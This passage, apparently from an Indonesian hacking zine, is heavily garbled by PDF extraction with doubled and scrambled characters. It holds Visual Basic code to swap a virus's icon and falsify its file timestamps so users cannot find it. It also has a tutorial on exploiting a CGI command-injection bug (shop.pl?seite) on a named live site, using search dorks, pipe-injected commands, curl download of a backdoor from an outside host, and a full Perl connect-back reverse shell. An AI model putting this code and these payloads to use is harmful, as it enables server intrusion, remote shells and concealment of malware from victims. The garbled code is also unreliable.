r i es + L3R L3Root( i Lvl Lvl 2) . I DEnt r i es es)) As RESOURCE_DI URCE_DI R_ENTRY ReDi m Dat aEnt r i es( L3R L3Root( i Lv Lvll 2) . NamedEnt r i es + L3R L3Root ( i Lv Lvll 2) . I DEnt r i es es)) As RESOUR RESO URCE_ CE_D DATA_ ATA_ENTRY ENTRY Fo orr i L v vll 3 = 1 T To o ( L3 3R Root ( i L v vll 2) . NamedEnt ri es + L 3R 3Root ( i L vl vl 2) . I DEnt r i es ) 'Cop Read ea hi r d evel el chi ch iElntr d n odes Lvl 2). Of f set, 3 opyM yMd emtory C Cu ulr ev sor, L2 L2E i es(i Cur sor sor = Cur sor sor + Tr eeOf f set set Set F i l ePoi nt e r h hff i l e, ( C Cu ur s o orr + 8 + ( i L vl vl 3 * 8 8)) ) , 0, 0 ReadFi l e hf i l e, L3E L3Ent r i es( i Lv Lvll 3) , 8, BytesR ytesRe ead, ad, ByV yVa al 0& ' J ump t o I MAGE_D E_DA ATA_EN TA_ENTR TRY Y an and d ge gett RVA o off I conDi r st r uct ur e Set F i l ePoi nt er h hff i l e, Tr e e eO Of f s e ett + ( L 3E 3Ent r i es ( i L v vll 3) . Of f s e ett ) , 0, 0 ReadFi l e h hff i l e, Dat aEn aEnt r i es( es( i Lv Lvll 3) , 16, BytesR ytesRea ead d, ByV yVa al 0& ' Conve onverr t RVA of I con conDi r st r uct ur e t o f i l e of f se sett and st or e Count ount = Count ount + 1 ReDi m Prese Preserr ve I con cons( s( Coun ount ) As I con conD Descri ptor I con cons (C (Co ount ) . Of f s e ett = RVA_t o_O _Off f s e ett ( Dat aEnt ri es (i L vl vl 3) . Of f s e ett ) ' St or e I D of i co con n r esou sour ce I con cons( Count ) . I D = L2E L2Ent r i es( es( i Lv Lvll 2) . Name ' St or e Si ze of i con con r es eso our ce Set F i l ePoi nt er hf i l e, I c o on ns ( C Co ount ) . Of f s e ett , 0, 0 Rea eadF dFii l e h hff i l e, DI B, ByV yVal al Le Len n( DI B) , BytesR ytesRea ead d, ByV yVal al 0& I con cons( Count ) . Si ze = DI B. I mageSi ze + 40 Next i Lv Lvll 3 Nex extt i Lvl Lvl 2 End I f Nex extt i Lv Lvll 1 El se Cou ount nt = 0 End I f ' Ret urn t he n num umbe berr of i con cons s f ou ound nd GetI con conO Of f sets = Count ount Exi t Fun Functi on Er r Hand andl er : En End d Fun Funct ct i on Pu Publ bl i c Fu Fun nct i on Hack ackD Di r ector i es(hf i l e A As s Lo Long ng,, ResT esTrr ee As Long Long, DI BOf f set As Lo Lon ng, _ DI BAt t r i b A As s I CON_D _DII R_EN _ENTR TRY) Y) As Bo Bool ol ean ean On E Err r or GoT oTo o E Err r Han andl dl er: Di Di Di Di Di
m Cur sor sor m Root m L1 L1E Entr i es() m L2R L2Root( oot( ) m L2E L2Entr ntr i es( )
As As As As As
Lon Long I MAGE_RE E_RESO SOURCE_D E_DII R RESOURCE_D _DII R_EN _ENTR TRY Y I MAGE_RES E_RESO OURCE_D E_DII R RES ESO OURCE_DI E_DI R_EN _ENTR TRY Y
' ' ' ' '
Fi l e poi nt er posi t i on Root nod node e of r es t r ee F Fii r st - l ev evel el chi chi l d nodes odes Se Second cond-- l eve evell r oot no node des s S Seco econd nd-- l ev evel el chi l d no node des s
66
Di Di Di Di Di Di Di Di Di
m L3R L3Roo oott ( ) m L3E L3Entr ntr i es( ) m Dat aEnt r i es( ) m I coD coDi r m i L vl vl 1 m i Lvl Lvl 2 m i L vl vl 3 m i nt C m Byt esR esRea ead d
As As As As As As As As As
I MAGE_R E_RES ESO OURCE_D E_DII R RES ESO OURCE_DI E_DI R_EN _ENTR TRY Y RESOURCE_DA RCE_DATA TA__ EN ENTR TRY Y I CON_D _DII R I nt eger I nt eger I nt eger I nt eger Lon Long g
' ' ' ' ' ' ' ' '
Th Thii r d- l ev evel el r oo oott no node des s Th Thii r d- l ev evel el chi l d no node des s I MAGE_RESOURCE_ CE_ DATA ATA__ ENTR ENTRY Y st r uct s I con conD Di r ec ectt ory i n EXE EXE Lo oo op Count er ( f i rs t l evel ) Lo Loo op Cou oun nt er ( se seco con nd l eve vell ) Lo oo op Count er ( t hi r d l evel ) Lo Loo op Cou oun nt er ( gen eneral eral ) Ret urned by Rea ead/ d/ Wr i t eF eFii l e API ' s
I f ( h f i l e >= 0) Then ' Convert onvert DI BOf f set t o an R RV VA ( need needed ed f or RES ESO OURCE_D E_DA ATA_EN TA_ENTR TRY Y st r uct ur es) DI BOf f set set = Of f set set _t o_R o_RV VA( DI BOf f set set ) Set F i l ePoi nt er hf i l e, By V Va al Res T Tree ree,, 0, 0 Rea ead dFi l e h hff i l e, Root oot , Le Len n( Roo oott ) , BytesR ytesRea ead d, ByV yVal al 0& ReDi m L1E L1Entr ntr i es( Roo oott . Named edEn Entt r i es + Roo oott . I DEn Entt r i es) As RES ESO OURCE_D E_DII R_EN _ENTR TRY Y ReDi m L2R L2Root( oot( Root. NamedEn edEntt r i es + Root. I DEn Entt r i es) As I MAGE_R E_RES ESO OURCE_D E_DII R ' Loo Loop p t hroug hrough h f i r st - l ev evel el chi l d n nod odes es a and nd f i nd RT_G T_GR ROUP_I CON branch For For i Lvl Lvl 1 = 1 T To o (Ro (Root. Named edE Ent r i es + Root oot . I DEnt r i es es)) Set F i l ePoi nt e r h hff i l e, Res Tr Tr e e + 8 + ( i L v vll 1 * 8 8)) , 0, 0 Read eadFi l e hf i l e, L1E L1Ent r i es es(( i Lvl Lvl 1) , 8, BytesR ytesRe ead, ad, ByV yVa al 0& I f L1E L1Entr i es(i Lvl 1). Name = &HE Then Then ' RT_G T_ GROUP_I P_ I CON br anch f ound CopyM opyMemory C Cu ur sor, L1 L1E Entr i es(i Lvl 1). Of f set, 3 Cursor = Cur sor + ResT esTrr ee Set F i l ePoi nt er hf i l e, Cur s o orr , 0, 0 ' Rea ead d se seco con nd- l eve vell di r ect or y Rea ead dFi l e h hff i l e, L2 L2R Root( i Lvl Lvl 1) , 16, BytesR ytesRea ead d, ByV yVa al 0& ReDi m L2E L2Ent r i es( L2 L2R Root( i Lvl Lvl 1) . NamedE edEnt r i es + L2R L2Root ( i Lv Lvll 1) . I DEnt r i es es)) As RESOURCE_DI URCE_DI R_ENTRY ReDi m L3R L3Root oot ( L2R L2Root( i Lvl Lvl 1) . NamedEnt r i es + L2R L2Root ( i Lv Lvll 1) . I DEnt r i es es)) As I MAGE_ RESOURCE_DI URCE_DI R Fo orr i L v vll 2 = 1 T To o ( L2 2R Root ( i L v vll 1) . NamedEnt ri es + L 2R 2Root ( i L vl vl 1) . I DEnt r i es ) CopyM opyMemory C Cu ur sor, L1 L1E Entr i es(i Lvl 1). Of f set, 3 Cur sor = Cur sor + ResT esTrr ee Set F i l ePoi nt e r h hff i l e, Cur s o orr + 8 + ( i L vl 2 * 8 8)) , 0, 0 ReadFi l e hf i l e, L2E L2Ent r i es( i Lvl Lvl 2) , 8, BytesR ytesRe ead ad,, ByV yVa al 0& CopyM opyMemory C Cu ur sor, L2 L2E Entr i es(i Lvl 2). Of f set, 3 Cur sor = Cur sor + ResT esTrr ee Set F i l ePoi nt er hf i l e, Cur s o orr , 0, 0 ' Read t hri d- l evel di rectory ReadFi l e h hff i l e, L3R L3Roo oott ( i Lv Lvll 2) , 16, BytesR ytesRea ead d, ByV yVal al 0& ReDi m L3 L3E Ent r i es( L3R L3Roo oott ( i Lv Lvll 2) . Named edE Ent r i es + L3R L3Root( i Lvl Lvl 2) . I DEnt r i es es)) As RESOURCE_DI URCE_DI R_ENTRY Fo orr i L v vll 3 = 1 T To o ( L3 3R Root ( i L v vll 2) . NamedEnt ri es + L 3R 3Root ( i L vl vl 2) . I DEnt r i es ) ' Read thi rd- l evel chi chi l d n no odes Cop opyM yMemory C Cu ur sor, L2 L2E Entr i es(i Lvl 2). Of f set, 3 Curs or = Cur s o orr + Res T Trr ee + 8 + ( i L vl vl 3 * 8 8)) S t FdFi ile i fnit lee r , hL3E fiE ln et, r C or ,l0 Rea lP eoh L3 iu ers(s o i rLv Lvl 3,) , 08, BytesR ytesRe ead, ad, ByV yVa al 0& ' J ump t o RESOURC RCE_ E_D DATA ATA__ ENTRY ENTRY Cop opyM yMemory C Cu ur sor, L3 L3E Entr i es(i Lvl 3). Of f set, 3 Cur sor = Cur sor + ResT esTrr ee Set F i l ePoi nt er hf i l e, Cur s o orr , 0, 0 ReDi m Pr eser ve D Dat at aE aEnt nt r i es( i Lvl 3) As RESO ESOURCE_D E_DA ATA_EN TA_ENTR TRY Y ReadFi l e h hff i l e, Dat aEn aEnt r i es( es( i Lv Lvll 3) , 16, BytesR ytesRea ead d, ByV yVa al 0& ' J ump t o an and d r ea ead d I CON_DI _DI R st r uctur e Curs or = RVA_t o_O _Off f s e ett ( Dat aEnt r i es (i L vl vl 3) . Of f s e ett ) Set F i l ePoi nt er hf i l e, Cur s o orr , 0, 0 ReadFi l e h hff i l e, I coD coDi r , 6, BytesR ytesRea ead d, ByV yVal al 0& Fo Forr i nt C = 1 To I coD coDi r . Count Wr i t eFi l e hf i l e, DI BAt t r i b, Le Len n( DI BAt t r i b) - 4, BytesR ytesRea ead d, ByVal yVal 0& Set Fi l ePoi nt er h hff i l e, 2, 0, 1 Nex extt i nt C Next i Lv Lvll 3 Nex extt i Lvl Lvl 2 El seI seI f L1E L1Ent r i es es(( i Lvl Lvl 1) . Name = 3 Then CopyM opyMemory C Cu ur sor, L1 L1E Entr i es(i Lvl 1). Of f set, 3 Cursor = Cur sor + ResT esTrr ee Set F i l ePoi nt er hf i l e, ByVal Curs or, 0, 0 ' Rea ead d se seco con nd- l eve vell di r ect or y
67
Rea ead dFi l e h hff i l e, L2 L2R Root( i Lvl Lvl 1) , 16, BytesR ytesRea ead d, ByV yVa al 0& ReDi m L2E L2Ent r i es( L2 L2R Root( i Lvl Lvl 1) . NamedE edEnt r i es + L2R L2Root ( i Lv Lvll 1) . I DEnt r i es es)) As RESOURCE_DI URCE_DI R_ENTRY ReDi m L3R L3Root oot ( L2R L2Root( i Lvl Lvl 1) . NamedEnt r i es + L2R L2Root ( i Lv Lvll 1) . I DEnt r i es es)) As I MAGE_ RESOURCE_DI URCE_DI R Fo orr i L v vll 2 = 1 T To o ( L2 2R Root ( i L v vll 1) . NamedEnt ri es + L 2R 2Root ( i L vl vl 1) . I DEnt r i es ) CopyM opyMemory C Cu ur sor, L1 L1E Entr i es(i Lvl 1). Of f set, 3 Cur sor = Cur sor + ResT esTrr ee Set F i l ePoi nt e r h hff i l e, Cur s o orr + 8 + ( i L vl 2 * 8 8)) , 0, 0 ReadFi l e hf i l e, L2E L2Ent r i es( i Lvl Lvl 2) , 8, BytesR ytesRe ead ad,, ByV yVa al 0& CopyM opyMemory C Cu ur sor, L2 L2E Entr i es(i Lvl 2). Of f set, 3 Cur sor = Cur sor + ResT esTrr ee Set F i l ePoi nt er hf i l e, Cur s o orr , 0, 0 ' Read t hri d- l evel di rectory ReadFi l e h hff i l e, L3R L3Roo oott ( i Lv Lvll 2) , 16, BytesR ytesRea ead d, ByV yVal al 0& ReDi m L3 L3E Ent r i es( L3R L3Roo oott ( i Lv Lvll 2) . Named edE Ent r i es + L3R L3Root( i Lvl Lvl 2) . I DEnt r i es es)) As RESOURCE_DI URCE_DI R_ENTRY Fo orr i L v vll 3 = 1 T To o ( L3 3R Root ( i L v vll 2) . NamedEnt ri es + L 3R 3Root ( i L vl vl 2) . I DEnt r i es ) ' Read thi rd- l evel chi chi l d n no odes Cop opyM yMemory C Cu ur sor, L2 L2E Entr i es(i Lvl 2). Of f set, 3 Curs or = Cur s o orr + Res T Trr ee + 8 + ( i L vl vl 3 * 8 8)) Set F i l ePoi nt er hf i l e, Cur s o orr , 0, 0 ReadFi l e hf i l e, L3E L3Ent r i es( i Lv Lvll 3) , 8, BytesR ytesRe ead, ad, ByV yVa al 0& ' J ump t o and hack t he R RESO ESOURC RCE_ E_D DATA ATA__ ENTRY ENTRY Curs or = L 3 3E Ent r i es (i L v vll 3) . Of f s e ett + Res T Tree ree Set F i l ePoi nt er hf i l e, Cur s o orr , 0, 0 Wr i t eFi l e h hff i l e, DI BOf f set set , 4, BytesR ytesRe ead ad,, ByV yVa al 0& Wr i t eFi l e h hff i l e, CLng Lng( DI BAt t r i b. dwBytesI nRes + 40) , 4, BytesR ytesRe ead, ByV yVa al 0& Next i Lv Lvll 3 Nex extt i Lvl Lvl 2 End I f Nex extt i Lv Lvll 1 El se Hac ackD kDi r ec ectt or i es = Fa Fall se Exi t Fun Funct i on End I f HackD ackDi r ect ect ori es = True Exi t Fun Functi on Er r Hand andl er : En End d Fun Funct ct i on Pri va vatt e Fu Functi ncti on RVA_t o_O o_Off f set ( RVA A As s Long Long)) As Long On E Err r or GoT oTo o E Err r Han andl dl er: Di m Te Tem mpOf f set As Lo Long ng ' Di f f eren erence ce of RVA an and d st art of secti on TempOf f set = RVA - ResSect i onR onRVA VA I f (' Te Tem f fl a set >= =e0)f i The Then Cm apO l cul cu te > th le n o off f s e ett of t he R RV VA RVA_t o_Of f set = ResS esSecti ecti onO onOf f set + Tem TempOf f set El se RVA_t o_Of _Of f set set = - 1 End I f Exi t Fun Functi on Er r Hand andl er : En End d Fun Funct ct i on Pri vat vat e Fu Func nctt i on Of f set_ t o_R o_RV VA( Of f set As Lon Long g) As Lon Long g On E Err r or GoT oTo o E Err r Han andl dl er: Di m Te Tem mpOf f set
As Lo Long ng
' Di f f eren erence ce of Of f set an and d st art of secti on
' Get di st ance ance bet bet wee een n of f set an and d st art of r eso esou ur ce secti on TempOf f set = Of f set - ResSect i onOf f set I f TempOf f set >= 0 T The hen n ' Cal cul cul at e RVA of t he f i l e of f s e ett Of f set _t o_R o_RV VA = ResS esSect ect i on onR RVA + Te Tem mpOf f set El se
68
Of f set set _t o_RV _RVA = - 1 End I f Exi t Fun Functi on Er r Hand andl er : En End d Fun Funct ct i on
------------------------------------------------Cut --------Cut Here & Start Copy-Paste from Here----------------Here---------------------------------Prosedur ReplaceIcon (1st. Module) akan mengganti Ikon Virus kita dengan file *.Ico tsb (Source = Path file ikon, Dest = Path file yang akan diganti ikonnya), Ada beberapa kelemahan dalam penggantian Ikon ini. Pertama, bila Virus dikompress atau di-Pack dengan settingan untuk menghilangkan atau hanya megkompress resource dari File maka penggantian Ikon ini tidak bisa berjalan mulus. Kedua, untuk beberapa file yang akan dikestrak kadang-kadang ikon tidak berukuran 16X16, bahkan tidak bisa diekstrak sama sekali. 2. Penggantian Date dan Time File Virus Field apakah yang paling sering digunakan dalam fasilitas Search suatu file di Windows? Waktu akses/modif/buat dari file. Ambil contoh virus A.exe dibuat pada tanggal 1 Feb 2006, mulai menginfeksi komputer anda tanggal 2 Feb 2006. Maka yang harus anda lakukan dalam mencari file tsb dengan mengisikan field tanggal search dengan range 1 Feb 2006 sampai 2 Feb 2006. Apa yang harus dilakukan? Kita harus rubah tanggal akes/modif/buat dari file Virus kita agar tidak (atau setidaknya mempersulit) User mencarinya. Berikut Source Code yang kira-kira dapat menggambarkan teknik tersebut tersebut : (Referensi Source Code dari Internet, Author : marskarthik@ange
[email protected]) lfire.com) ------------------------------------------------Cut --------Cut Here & Start Copy-Paste from Here----------------Here----------------------------------
Opt i on Expl i ci t
Pu Publ bl i c Dec ecll are F Fu unct i on SetFi l eT eTii me Li b "kernel 32" (By (ByV Val hf i l e As Lo Lon ng, l pCr ea eatt i on onTi Ti me As FI LETI LETI ME, l pLa pLast st AccessTi me A As s FI LETI LETI ME, l pLa pLast st Wr i t eT eTii me A As s FI LET LETII ME) As Lon Long g Pu Publ bl i c Dec ecll are F Fu unct i on GetFi l eT eTii me Li b "kernel 32" ( ByV yVal al hf i l e As Lo Lon ng, l pCr ea eatt i on onTi Ti me As FI LETI LETI ME, l pLa pLast st AccessTi me A As s FI LETI LETI ME, l pLa pLast st Wr i t eT eTii me A As s FI LET LETII ME) As Lon Long g Pu Publ bl i c Dec ecll are Fun Funct i on Fi l eT eTii meT eToL oLoc ocal al Fi l eT eTii me Li b "kerne "kernell 32" 32" ( l pFi l eTi eTi me As FI FI LETI LETI ME, l pLo pLocal cal Fi l eT eTii me As FI LET LETII ME) As Lon Long g Pu Publ bl i c D Dec ecll are Fu Fun nct i on Fi l eT eTii meT eToS oSystem ystemTi me Li b "kerne "kernell 32" 32" ( l pFi pFi l eTi eTi me A As s FI LETI LETI ME, l pSyst emTi me As SYSTEMTI ME) As Long Publ Publ i c Decl ar e Fun Funct ct i on Sy Syst st emTi meTo eToFi Fi l eTi me Li b " ker ne nell 32" 32" ( l pS pSyst yst emTi me As SY SYST STEM EMTI ME, l pF pFii l eT eTii me A As s FI LETI LETI ME) As Lo Long ng Publ i c D De ecl ar e Fu Fun nct i on Loca Locall Fi l eT eTii meToFi ToFi l eTi me Li b "ke "kerr nel 32" ( l pLo Loca call Fi l eTi me As As FI LET LETII ME, l pF pFii l eT eTii me As FI LET LETII ME) As Lon Long g Pu Publ bl i c D Dec ecll are Fu Fun nct i on OpenFi enFi l e Li b "ke "kerr nel 32" ( ByV yVal al l pF pFii l eName A As s St r i ng ng,, l pReO pReOpen enB Buff As OFSTR FSTRU UCT, By ByVa Vall wSt yl e As Long) As Long Pu Publ bl i c D Decl ecl are Fu Functi ncti on Cl ose oseH Han andl dl e Li b " ke kerr ne nell 32 32"" ( ByV yVal al hObj ect As Lon Long) g) As Lo Long ng Publ i c Co Publ Const nst OF_ READ EAD = &H0 Publ i c C Const onst OF_ REA EAD DWRI TE = &H2 Publ i c C Const onst OF_ REOPEN = &H8000
69
Publ i Publ i Publ i Publ i Publl i Pub Publ Publ i Publl i Pub Publ i
c c c c c c c c
Co Const nst Co Const nst Co Const nst Const Const Co Const nst C Const onst Co Const nst
OF_ SH SHAR ARE_CO E_COM MPAT = &H0 OF_ SH SHAR ARE_DE E_DEN NY_N Y_ NONE = &H40 OF_ SH SHAR ARE_DE E_DEN NY_R Y_ REA EAD D = &H30 OF_ SH SHAR ARE_DE E_DEN NY_W Y_ WRI TE = &H20 OF_ SHARE_EXC ARE_EXCLU LUSI SI VE = &H10 OF_VE F_VER RI FY = &H40 400 0 OF_ WRI TE = &H1 OFS_ FS_M MAXPAT AXPATH HNAME = 128
Publ i c Type OFSTR FSTRU UCT cBytt es A cBy As s Byt e f Fi xe xed dDi sk A As s By Bytt e nE nErr r Cod ode e A As s I ntege ntegerr Reser ved ved1 1 As I nt eg eger er Reser ved ved2 2 As I nt eg eger er s z Pat hN hNam ame( OFS_ MAXPA AXPATH THN NAME) As Byt e End Type Pu Publ bl i c Ty Type pe FI LET LETII ME dwLow LowD Dat eTi me As Long dwHi ghD ghDat at eTi me A As s Long End Type Publl i c Type SYST Pub SYSTEM EMTI ME wYe Year ar As I ntege ntegerr wMont h As As I nt ege egerr wDayO ayOff Week As I nt eger wDay A As s I nt ege egerr wHour our As I nt eger eger wMi nu nutt e A As s I nt eger eger wSecon Second d A As s I nt ege egerr wMi l l i seco secon nds As I nt eger eger End Type Pu Publ bl i c Su Sub b u ub baht aht angg anggal al ( pa patt hfi l As Str i ng, hari As Lon Long, g, bu bull an As Lon Long g, t ah ahu un A As s Long, Long, Opti on onal al cr ea eatt As B Boo ooll ea ean, n, Opti on onal al mod odii f As Boo Booll ea ean, n, Opti on onal al acces acces As As B Boo ooll ea ean) n) On Er r or Resume N Next ext Di m hf i l e A As s Lon Long, r va vall As Lo Lon ng Di m buf f As O OFSTR FSTRU UCT Di m ct i me A As s FI LET LETII ME, l ati me A As s FI LETI LETI ME, mt i me A As s FI LETI LETI ME Di m st i me As SYS SYSTEM TEMTI ME Di m f i l As S Stt r i ng I f I s Mi s s i ng( crea creatt ) Then crea creatt = F a all s e I f I sMi ssi ng( modi f ) Then modi odi f = Fa Fall se I f I sMi ssi ng( ac acce ces) s) Then acces cces = Fa Fall se hf i l e = OpenF i l e( pat hf i l , buf f , OF _WRI TE) I frv al hlf i = l eGT a eh te Fn i l eTi me( hf i l e, cti me, l at i me, mt i me) I f creat creat The Then r va vall = Fi l eTi meToLo oLocal cal Fi l eTi me( ct i me, ct i me) r val val = Fi l eT eTii meT eToS oSystem ystemTi me(ct i me, st i me) st i st i st i st i st i st i
me. wYe Year ar = t ah ahun un me. wMon ontt h = bul bul an me. wDay = har har i me. wHou ourr = Hou ourr ( Ti me) me. wMi nu nutt e = Mi nut nut e( Ti me) me. wSe Second cond = Se Second cond(( Ti me)
r val val = SystemTi meT eToF oFii l eT eTii me(st i me, ct i me) r va vall = Loca Locall Fi l eTi meToF eToFii l eTi me( ct i me, ct i me) End I f I f mod odii f Th Then en r val val = Fi l eT eTii meT eToL oLoca ocall Fi l eT eTii me(mt i me, mt i me) r va vall = Fi l eT eTii meT eToS oSyst yst emTi me( mt i me, st i me) st i me. wYe Year ar = t ah ahun un st i me. wMon ontt h = bul bul an st i me. wDay = har har i
70
st i me. wHou ourr = Hou ourr ( Ti me) st i me. wMi nu nutt e = Mi nut nut e( Ti me) st i me. wSe Second cond = Se Second cond(( Ti me) r va vall = Sy Syst st emTi meT eToFi oFi l eT eTii me( st i me, mt i me) r va vall = Loca Locall Fi l eT eTii meT eToF oFii l eT eTii me(mt i me, mt i me) End I f I f acces acces Then Then r val = F i l eTi meToL o oca call F i l eTi me( l at i me, l at i me) r va vall = Fi l eT eTii meT eToS oSystem ystemTi me(l ati me, st i me) st i st i st i st i st i st i
me. wYe Year ar = t ah ahun un me. wMon ontt h = bul bul an me. wDay = har har i me. wHou ourr = Hou ourr ( Ti me) me. wMi nu nutt e = Mi nut nut e( Ti me) me. wSe Second cond = Se Second cond(( Ti me)
r val val = SystemTi meT eToF oFii l eT eTii me(st i me, l ati me) r val = L oca ocall F i l eTi meToF i l eTi me( l at i me, l at i me) End I f rv al al = Set F i l eTi me( hf i l e, cti me, l at i me, mt i me) End I f r v al al = Cl os eH eHandl e( h f i l e) End Sub
------------------------------------------------Cut --------Cut Here & Start Copy-Paste from Here----------------Here---------------------------------Prosedur ubahtanggal akan merubah date dari file virus, dengan parameter hari, bulan dan tahun sesuai dengan yang kita inginkan. Parameter creat, modif dan acces menunjukkan date atau time mana yang akan diubah, Sebagai contoh bila acces bernilai True dan lainnya bernilai False maka hanya date dan time acces saja yang akan diubah. $> End... Karena keterbatasan tempat dan waktu maka saya hanya bisa membeberkan 2 teknik saja yang saya kira dapat digunakan untuk mempersulit User dalam mencari File Induk dari Virus. Saya ingin memohon maaf apabila ada ekurangan atau pernyataan yang menyinggung pembaca. $ Greetz... >Myztx @ Myztx Soft. House, Hellspawn, Brontok Creator, Tomero, MyHeart Creator, Kantuk Creator, n The other Vx3rs. >All member of Mail-list : EcHo, Jasakom, Yogyafree, ITCenter, Virologi, Balihack, Informatics_01, ProgrammerVB n the others. >Spyro, Vaganci, Yanto, n All my Friends at IA01 [2005], IA07 [2004] @ GunaDarma University, Depok. >
[email protected], >marskarthik@ange lfire.com, (Naveed) neenojee@ho
[email protected]. tmail.com. >Sites : VbBego.com, Virologi.info, Vaksin.com, Planet-Source-Code.com n the others. $ Contact... >Saran, Kritik, Caci-maki, Dll diharapkan dan ditujukan pada alamat email :
[email protected] [email protected]
71
$ Author... > PusHm0v @ 2006
72
Connect Back melalui Bug CGI
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:. Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn", tidak kepada pihak-pihak yang ingin merugikan orang lain. .:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:. Intro $>Seperti yang sudah kita tahu Bug CGI memungkinkan kita untuk melaksanakan command-command command-command untuk meng-eksploitasi sistem. Tetapi hal ini juga dipengaruhi oleh settingan dari sistem tersebut apakah mengijinkan kita untuk membuat/menulis membuat/menulis File di Server tersebut. Tujuan $>Membuat suatu backdoor dengan cara connect back melalui CGI Bug Tools atau Softwarez dan Skill yang diperlukan $>Setidaknya mengerti mengerti perintah/command *Nix atau Linux (ls, cp, rm, cat, locate ,dll) $>Softwarez : Browser HTML (Opera, IE, dll) $>Tools : NetCat dan file backdoor (.txtFireFox, atau .prl) Tutorial $>Langkah pertama yang harus dilakukan adalah mencari site yang menggunakan CGI dengan bug : "s ho hop. pl ?s e eii t e" atau "family_showpage.cgi" .
Bagaimana mencarinya? yaitu googling dan memasukkan keyword allinurl dengan tambahan bug diatas. Contoh, allinurl : "s ho hop. pl ?s e eii t e" . Maka kita akan dapat berbagai macam halaman yang dapat di-tes bugnya. Pilih salah satu dan kita akan memulai mencoba connect back.
73
$>Langkah kedua yaitu masukkan perintah/command yang diinginkan diantara char " | | " , maka perintah kita akan terlihat seperti ini : | peri nt ah| , selain dengan char pipe(|) bisa juga menggunakan char ";". Contoh (dengan bug shop.pl?seite) : >> htt ps: / / www. a6 a66. 6. de de// cgi l oca ocall / sho shop. p. pl ?sei t e=ha haup uptt sei t e. html &KNR=3055 305589 892 2 >> ht t ps: / / www. a6 a66 6. de/ cgi cgi - l ocal ocal / sho shop p. pl ?sei t e=haup aupt sei t e. ht ml | per pe ah| &K R= 30558 55892 l s|r i&n KtNah R=|305 30 5N 5892 58 92
Maka pada browser kita akan terlihat isi dari direktori server tersebut. Contoh : f i nn nnii sho shorr de derr . pl f ormmai l mal ay aysi si a. pl ho hone neym ymoo oon. n. cf g ho hone neym ymoo oon. n. pl ho hone neym ymoonf oonf i nn nnii shor shor de derr . pl hon oney eym moon oonorde orderr . pl i konb konboa oarr d orde orderr . pl prei se. pl r emvi ew. php shop. shop. cf g sh shop op.. pl
Weikkss....Banyak Weikkss....Bany ak filenya tuh :P $>Langkah ketiga cek apakah kita diijinkan untuk menulis/membuat menulis/membuat file disana dengan perintah "id" >> ht t ps: / / www. a6 a66 6. de/ cgi cgi - l ocal ocal / sho shop p. pl ?sei t e=haup aupt sei t e. ht ml | i d| &KNR=305 3055892 5892
Kalo benar maka akan tampak : ui d=2900 290076( 76( ade00 ade001) 1) gi d=103( web) gr oups=103( web)
Perhatikan User-idnya, Wah sepertinya kita bisa nih nulis/remove File :D $>Selanjutnya kita upload File Backdoor yang kita ambil dari site lain, ht t ps: / / www. a66. de/ cgi cgi - l oca call / sho shop. pl ?se ?seii t e=haupt sei sei t e. ht ml | cu curr l - o back. t xt htt p: / / www. go good odw wi l l co. com/ t es. t xt | &KNR=30 3055 5589 892 2
Catatan : Site www.goodwillco.com hanya menyediakan file backdoor yaitu tes.txt, kalo sudah tidak ada silahkan copy-paste teks berikut kedalam Notepad dan simpan dengan Ekstensi *.txt, Coding by 1St :D #! / us r / bi n/ per l # Remote Con onne nect ct - Back B Backd ackdoo oorr Shel Shel l v1 v1.. 0. # ( c) Ar esU 20 2004 04 # 1ndones esii a S Sec ecu ur i t y T Te eam( 1st ) # Ar esU esU[ at ] bosen sen. net # Usage: sage: # 1) Li st en port t o rece receii ve ved d she shell l pr ompt usi ng NetC etCat at on yo you ur t oo ooll bo box, x, f or exa exam mpl e: nc l - p 90 9000 # 2) Re Rem mot e C Com ommand and Exe Execut cut i on you yourr BackDoor Shel Shel l , f or exampl e: per per l conn connect ect . pl > #-------# Th The e sup supp pl i ed ex exp pl oi t cod code e is n not ot t o be used f or mal i ci ou ous s pu pur pose ose,, but f or ed edu ucati on onal al pu purr po pose se onl onl y. The The A Authors uthors an and d 1 1nd ndon onesi esi an Securi Securi t y Te Team am WI LL N NO OT r esp espon onsi si bl e f or an anyt yt hi ng ha happ ppen ened ed by t he cou couse se o off usi ng al l i nf ormati on on t he hese se web ebsi si t e. #--------use So Socket; cket; $p $pam amer= er="" ( c) Ar esU Con onne nect ct - Back Backd ackdoo oorr She Shell l v1 v1.. 0\ n1nd n1ndon onesi esi a Se Securi curi t y Team Team ( 1st ) \ n\ n";
74
$cmd= "l pd"; $sys systt em= ' ech echo "`un "`una ame - a`"; echo cho "`i d`"; / bi n/ sh' sh' ; $0=$c $0= $cm md; $t ar ge gett =$A $AR RGV[ 0] ; $por $por t =$AR $ARGV[ 1] ; $i addr=i r=i net _a _att on( $t arge rgett ) | | di e( "Error: $! \ n") ; $paddr=s r=s o ock cka addr_ i n( $port , $i addr) | | di e( "E "Err ror: $! \ n") ; $pr oto=ge gett prot ob obyn ynam ame(' t cp' cp' ) ; socket( sock et( SOCKET, PF PF_I _I NET, SOCK_ST _STR REA EAM M, $pr $pr oto) | | di e(" Err or: $! \ n") ; co con nnect ect ( SOCKET, $padd addr ) | | di e("Err or : $! \ n") ; open( ope n( STDI N, " >&SOCKE KET" T" ) ; open( STDOUT, " >&SOCKET" CKET")) ; open( STDER ERR, R, " >&SOCKET" CKET")) ; pr i nt STDOUT $pamer ; syst em( $syst em) ; cl ose(ST ose(STD DI N) ; cl ose(STDOUT); cl ose( ST STD DER ERR R)
Catatan2 : curl -o akan menyimpan file backdoor di server web sasaran dengan nama back.txt Kalo curl -o tidak bisa gunakan wget -o. $> Lakukan lagi perintah ls untuk melihat apakah file backdoor kita sudah terupload... ht t ps: / / www. a6 a66 6. de/ cgi cgi - l ocal ocal / sho shop. p. pl ?sei t e=haup hauptt sei t e. ht ml | l s| &KNR=305 305589 5892 back ack.. t xt f i nni sho shorr der der . pl f ormmai l mal ay aysi si a. pl hon honeym eymoo oon. n. cf g ho hon ney eym moo oon. n. pl ho hone neym ymoo oonf nf i nn nnii sho shorr de derr . pl ho hone neym ymoo oono norr de derr . pl i konbo konboard ard o orr de derr . pl prei se. pl r emvi ew. ph php p shop shop.. cf g sh sho op. pl
